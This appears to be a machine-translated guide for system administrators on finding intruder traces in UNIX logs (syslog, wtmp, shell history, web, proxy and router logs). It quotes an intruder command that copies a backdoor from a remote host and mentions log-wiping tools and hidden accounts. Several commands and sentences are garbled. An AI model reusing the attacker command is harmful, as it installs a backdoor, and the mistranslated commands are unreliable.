1. Messages
/var/adm is the log directory for UNIX (/var/log is under Linux). There are quite a few ASCII-formatted log files, of course, let's focus first on the messages file, which is generally a file of interest to intruders, and records information from the system level. The following is the record information that displays the copyright or hardware information:
APR 19:06:47 www login[28845]: FAILED login 1 from xxx.xxx.xxx.xxx, User not known to the underlying mod Ule
This is the record information for the login failure: APR 22:05:45 game pam_pwdb[29509]: (login) session opened to user Ncx by (uid=0).
The first step should be Kill-hup cat '/var/run/syslogd.pid ', which, of course, might have been done by intruders.
2. wtmp,utmp logs,ftp Log
You can find a file named Wtmp,utmp in the/var/adm,/var/log,/etc directory that records when and where the user logged on to the host, and there is one of the oldest and most popular zap2 in the hacker software (the compiled filename is generally called Z2, or wipe), which is used to "erase" the user login information in these two files, however, because of laziness or slow network speed, many intruders did not upload or compile the file. The administrator can use the Lastlog command to obtain the source address of the intruder's last connection (which, of course, could be a springboard for them). FTP log is generally/var/log/xferlog, the file details of the ftp file upload time, source, filename, etc., but because the log is too obvious, so a bit more sophisticated intruders will almost not use FTP to pass files, they generally use RCP.
3. Sh_history
With root permissions, intruders can build their own intrusion account, and the more advanced technique is to add a password to an infrequently used system username such as UUCP,LP. After the invasion, even if the intruder deletes a file such as. sh_history or. bash_hi-story, executing kill-hup ' cat/var/run/inetd.conf ' will write back the Bash command records that remain in the page of memory to disk. Then execute find/-name.sh_historyprint and carefully review each suspicious shell command log. You can find the. sh_history file in/USR/SPOOL/LP (LP Home dir),/usr/lib/uucp/, and possibly find a similar FTP xxx.xxx.xxx.xxx Or Rcpnobody@xxx.xxx.xxx.xxx:/tmp/backdoor/tmp/backdoor This can display an intruder IP or domain name command.
4. HTTP Server log
This is the most effective way to determine where the intruder's real attack originated. Take the most popular Apache server for example, in the $/logs/directory you can find access.log this file, which records the visitor's IP, access time and requested access to the content. After the invasion, we should be able to find information similar to the following in this file: record:xxx.xxx.xxx.xxx[28/apr/2000:00:29:05-0800] "Get/cgi-bin/rguest.exe" 404- XXX.XXX.XXX.XXX[28/APR/2000:00:28:57-0800] "get/msads/samples/selector/showcode.asp" 404
This indicates that an intruder from IP xxx.xxx.xxx.xxx attempted to access the/msads/samples/selector/showcode.asp file at 0:28 on April 28, 2000, which is a legacy of the day after using the web CGI scanner Log Most web scanners ' intruders often choose their nearest servers. Combined with attack time and IP, we can know a lot of information about intruders.
5. Core Dump
A secure and stable daemon does not "dump" the core of the system while it is running, and when intruders exploit a remote exploit, many services are executing a getpeername socket function call, so the intruder's IP is also stored in memory.
6. Proxy Server Log
Proxy server is a large and medium-sized enterprise network often used as an interface for internal and external information exchange, it faithfully records the access of each user
, including the access information of the intruder. Take the most commonly used squid agent as an example, usually you can find Access.log this huge log file under/usr/local/squid/logs/. You can get squid's log analysis script at the following address: http://www.squid-cache.org/Doc/Users-Guide/added/st. HTML through analysis of sensitive file access logs, You can know when and who visited these supposedly confidential content.
7. Router Log
By default, routers do not record any scans and logins, so intruders often use it as a springboard to attack. If your corporate network is divided into military and demilitarized zones, adding a router's logging will help track intruders later. More importantly, for administrators
, such a setting can determine whether an attacker is an internal thief or an external robber. Of course, you need an additional server to place the Router.log file.
Attention!
It is not possible for intruders to attempt to establish a TCP connection with the target in the entire process of executing an attack, there are many subjective and objective reasons for intruders, and it is quite difficult to keep the log out of the attack.
If we spend enough time and energy, we can analyze the intruder's information from a lot of logs. As far as the intruder's behavior is concerned, the more permissions they get on the target, the more they tend to use a conservative approach to establish a connection to the target machine. Careful analysis of the early logs, especially the ones that contain the scans, gives us a lot more to gain.
Log audit is only as an intrusion of passive defense means, the initiative is to strengthen their own learning, in time to upgrade or update the system, so preparedness is the most effective way to prevent intrusion.